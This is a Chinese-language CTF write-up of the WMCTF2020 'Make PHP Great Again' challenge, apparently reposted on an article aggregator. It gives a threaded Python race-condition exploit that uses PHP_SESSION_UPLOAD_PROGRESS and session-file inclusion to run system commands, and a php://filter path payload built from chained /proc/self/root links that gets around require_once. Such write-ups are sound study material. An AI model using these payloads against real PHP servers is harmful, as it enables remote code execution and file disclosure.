wmctf2020 Make PHP Great Again

2023-10-22 23:50
文章标签 php make great wmctf2020

本文主要是介绍wmctf2020 Make PHP Great Again,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

太菜了,只能不断的复现题目来扩充自己的知识点。

考点:

require_once 绕过

PHP_SESSION_UPLOAD_PROGRESS文件上传

 解题:

解一:

进入环境。

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {require_once $_GET['file'];
}

现在看到 include 和 require_once 都会不由得想到 利用PHP_SESSION_UPLOAD_PROGRESS来上传临时文件去RCE。 上传利用条件竞争去访问 /tmp/sess_xxx进行文件包含。关于这方面的知识就不班门弄斧了:利用session.upload_progress进行文件包含和反序列化渗透 - FreeBuf网络安全行业门户

直接搬出我的exp:

import io
import requests
import threading
import timeurl="http://613661fb-f8a9-4121-91b4-4f1329e22bae.node4.buuoj.cn:81/"
sessid="snowy"
myfile=io.BytesIO(b"test.txt" * 1024)
writedata={"PHP_SESSION_UPLOAD_PROGRESS" : "<?php system('cat /var/www/html/flag.php')?>"}
mycookie={"PHPSESSID":sessid}def write(ss):while True:time.sleep(0.5)resp=requests.post(url=url, data=writedata, cookies=mycookie, files={"file": ("test.txt",123)})def read(ss):while True:time.sleep(0.5)payloadurl=url+'?file='+'/tmp/sess_'+sessidresp=requests.get(url=payloadurl)if 'test.txt' in resp.text:print(resp.text)breakelse:passif __name__ == '__main__':envent=threading.Event()with requests.session() as ss:for i in range(0,30):threading.Thread(target=write, args=(ss, )).start()for i in range(0, 30):threading.Thread(target=read, args=(ss,)).start()envent.set()

 能够直接跑出flag。 如果一步步 改命令的话,最好改一下sessid。

解二:

在这里有个小知识点,/proc/self 指向当前进程的 /proc/pid/  , /proc/self/root/ 是指向 /  的符号链接,用伪协议配合 多级符号链接的办法进行绕过

payload:

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

一样能够得到flag ,具体文章可以参考:php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台

这篇关于wmctf2020 Make PHP Great Again的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/264368

相关文章

PHP原理之内存管理中难懂的几个点

PHP的内存管理, 分为俩大部分, 第一部分是PHP自身的内存管理, 这部分主要的内容就是引用计数, 写时复制, 等等面向应用的层面的管理. 而第二部分就是今天我要介绍的, zend_alloc中描写的关于PHP自身的内存管理, 包括它是如何管理可用内存, 如何分配内存等. 另外, 为什么要写这个呢, 因为之前并没有任何资料来介绍PHP内存管理中使用的策略, 数据结构, 或者算法. 而在我们

php中json_decode()和json_encode()

1.json_decode() json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json

如何将文件夹里的PHP代码放到一个文件里

find ./dir -name "*.php" -exec 'cat' {} \; > dir.out

PHP抓取网站图片脚本

方法一: <?phpheader("Content-type:image/jpeg"); class download_image{function read_url($str) { $file=fopen($str,"r");$result = ''; while(!feof($file)) { $result.=fgets($file,9999); } fclose($file); re

PHP防止SQL注入详解及防范

SQL 注入是PHP应用中最常见的漏洞之一。事实上令人惊奇的是,开发者要同时犯两个错误才会引发一个SQL注入漏洞。 一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。这两个重要的步骤缺一不可,需要同时加以特别关注以减少程序错误。 对于攻击者来说,进行SQL注入攻击需要思考和试验,对数据库方案进行有根有据的推理非常有必要(当然假设攻击者看不到你的

PHP防止SQL注入的方法(2)

如果用户输入的是直接插入到一个SQL语句中的查询,应用程序会很容易受到SQL注入,例如下面的例子: $unsafe_variable = $_POST['user_input'];mysql_query("INSERT INTO table (column) VALUES ('" . $unsafe_variable . "')"); 这是因为用户可以输入类似VALUE”); DROP TA

PHP防止SQL注入的方法(1)

(1)mysql_real_escape_string – 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = "select count(*) as ctr from users where username ='".mysql_real_escape_string($username)."' and password='". mysql_r

Linux系统安装php开发环境

Linux系统centos6.5 PHP5.6 MySQL5.6 Nginx1.7 yum安装依赖库 yum install -y make cmake gcc gcc-c++ autoconf automake libpng-devel libjpeg-devel zlib libxml2-devel ncurses-devel bison \libtool-ltdl-devel li

PHP字符串全排列

方法一: $str = 'abc';$a =str_split($str);perm($a, 0, count($a)-1);function perm(&$ar, $k, $m) {if($k == $m){ echo join('',$ar), PHP_EOL;}else {for($i=$k; $i<=$m; $i++) {swap($ar[$k], $ar[$i]);perm($ar

PHP实现二叉树遍历(非递归方式,栈模拟实现)

二叉树定义是这样的:一棵非空的二叉树由根结点及左、右子树这三个基本部分组成,根据节点的访问位置不同有三种遍历方式: ① NLR:前序遍历(PreorderTraversal亦称(先序遍历)) ——访问结点的操作发生在遍历其左右子树之前。 ② LNR:中序遍历(InorderTraversal) ——访问结点的操作发生在遍历其左右子树之中(间)。 ③ LRN:后序遍历(PostorderT